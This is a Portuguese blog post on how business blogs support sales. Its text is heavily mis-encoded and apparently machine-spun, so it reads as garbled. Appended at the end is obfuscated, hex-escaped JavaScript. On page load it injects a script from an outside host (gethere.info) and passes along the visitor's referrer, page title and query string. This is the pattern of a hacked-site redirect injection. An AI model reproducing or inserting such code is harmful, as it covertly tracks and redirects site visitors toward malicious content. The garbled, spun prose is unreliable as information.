Blog

Blogues E Vendas: Uma Parceria De Empreendimento Natural ?

Como www.subliprint.net o visitante pode supor, uma de principais razA�es pelas quais as empresas consideram estes blogs eficientes como ferramentas de negA?cios A� de que elas ajudam a ocasionar ou estimular as vendas. Embora nA?o haja um valor quantitativo com relaA�A?o A� importA?ncia monetA?ria exata dos blogs sobre as vendas, existem evidA?ncias de algum espA�cie de retorno sobre este investimento. Este aumento nas vendas tA?m a possibilidade de ser e geralmente foi um dos efeitos indiretos dos blogues de sucesso.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador com milhA�es de pessoas (acionistas, parceiros do negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando a cerca de negA?cios e afins. Agora imagine se vocA? pode vir a usar praticamente as informaA�A�es que o visitante aprendeu para estabelecer o produto ou serviA�o que seus clientes querem, por que eles querem, como eles querem e quanto eles estA?o dispostos a pagar portanto. Isto A� especialmente precisamente o que A� especialmente um blogue e muito mais. Definitivamente, os blogs sA?o bons para as empresas.

Um blogue ou um blog foi um sitio interativo que mantA�m uma crA?nica contA�nua de informaA�A�es. A� um site atualizado regularmente usando links para outros artigos ou outros sites. Geralmente, um blog tende a ter uma A?rea por conteA?do principal com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa usando as ainda mais recentes no topo. Geralmente, esses artigos sA?o organizados em categorias. HA? igualmente um arquivo de artigos baseado em datas. Um blogroll, uma lista do links para outros sitios relacionados A� outra caracterA�stica de um blog.

Um blogue pode atalhar um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que A� especialmente atualizado periodicamente. Um leitor de feeds exibe a nova postagem e um link para ela. A maioria dos blogues tambA�m tem um recurso que permite aos visitantes deixar comentA?rios. Com um blog, vocA? publica novos conteA?dos e seus leitores podem juntar seus prA?prios comentA?rios usando links para seus prA?prios blogs. Elementar de usar ferramentas de blogs estA?o disponA�veis, muitas vezes de graA�a. Uma ferramenta bA?sica do blogging fornece uma interface onde o visitante pode funcionar de forma fA?cil e intuitiva como cuida do restante da logA�stica envolvida em tornar seu blogue apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter um blog A� especialmente uma das A?reas do rA?pido crescimento da Net. De convA�nio com o popular motor de busca Technorati, andam mais do 40 milhA�es de blogues na Net hoje em dia e mais blogues estA?o aparecendo na taxa de 75. 000 por dia. Isto A� principalmente devido aos inA?meros benefA�cios do blogs para negA?cios.

Um blogue tem uma poderosa propriedade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Agora vocA? pode ter uma presenA�a predominador na Web, nA?o baseada em tamanho, capital ou recursos, mas baseada na qualidade por conteA?do, pA?blico-alvo e suplementos e serviA�os A?teis. Com blogs como equalizadores, a blogosfera se tornou um campo de jogo verdadeiramente estimulante para todas as empresas.

Um blogue A� uma fonte repetida de informaA�A�es valiosas e atualizadas. A criaA�A?o por um blogue permite de que vocA? demonstre sua experiA?ncia e se estabeleA�a saiba como um lA�der de ideias em seu setor. Um blogue pode ser seu veA�culo para atualizaA�A�es de suplementos alimentares ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o de que vocA? queira transmitir ao seu pA?blico-alvo. Um blog deve conter informaA�A�es relevantes, nA?o apenas arremessos de vendas; caso contrA?rio, foi muito menos provA?vel de que os leitores retornem. Como acontece com qualquer parte de um plano de marketing da empresa, um blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� um mA�todo eficaz para se comunicar com clientes e prospects. Ele permite de que vocA? converse abertamente e regularmente usando eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos com eles a partir de o inA�cio. Um blogue com seu estilo de conversaA�A?o A� ideal para desenvolver bons relacionamentos com os clientes. Os leitores sentir-se-A?o desembaraA�ado consigo demasiado antes de telefonarem-lhe para criar uma adquire ou emanar o seu serviA�o.

Um blogue A� uma A?tima ferramenta para adquirir feedback dos leitores. Seus leitores podem deixar comentA?rios ou criar perguntas. 1 blog A� especialmente uma A?tima maneira do descobrir este que estes leitores estA?o pensando e no processo fornece idA�ias ou como melhor atendA?-los, melhorando assim sendo o seu negA?cio. Formar decisA�es de negA?cios usando base nos feedbacks destes leitores tA?m a possibilidade de ser um dos movimentos mais inteligentes que o visitante pode realizar.

No entanto, para ser eficaz, 1 blog possui que ser atualizado usando freqA?A?ncia. Estes leitores nA?o visitam blogs que nA?o apresentam novos conteA?dos regularmente. Manter os leitores informados com postagens periA?dicas a respeito de o seu negA?cio cria buzz e publicidade. Existe trabalho envolvido na criaA�A?o de um blog. Leva tempo e compromisso para escrever posts interessantes e informativos. Contudo pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogs e Vendas Em Tandem

As vendas exigem interaA�A?o pessoal. Um blogue A� 1 desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes de que eles podem possibilitar usar atravA�s do seu blog de forma consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para mais conteA?do fresco regularmente. Horas extras, o visitante serA? pesado de construir um pA?blico fiel. Estes leitores vA?o vA?-lo saiba como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o de que A� menos arriscado comprar de o visitante ou aproveitar seu serviA�o. Se vocA? pode blogar eficientemente a respeito de o tema, eles tendem a acreditar que seu produto ou serviA�o valerA? a penudo.

Ao blogar, vocA? estA? enviando a recado de que alguA�m estA? ouvindo, alguA�m que vocA? pode abordar como pode ser visto a partir de comentA?rios respondidos e novas atualizaA�A�es. Isso farA? usando que seus leitores se sintam ainda mais seguros e levarA? isso em traA�o, pois eles tomam uma decisA?o por compra. Este blog A� inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e gera familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� mesmo vocA? para obter mais informaA�A�es e, se receberem a opA�A?o, desejarA?o comprar de vocA?. Isso fortalece o relacionamento entre o visitante e seus clientes e eles igualmente podem enviar outras vendas para vocA?. O ciclo continua. AlA�m disso, 1 blog A� uma maneira extremamente eficaz para adquirir um ranking elevado do Search Engine. Em outras palavras, estes blogs podem possibilitar trazer mais leitores e mais compradores em potencial.

Blogar foi marketing para as pessoas por uma maneira menos intrusiva e ofensiva, mais como uma conversa freewheeling em comparaA�A?o usando um discurso de vendas irritante. A� realmente uma boa maneira de promover as vendas, ainda que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}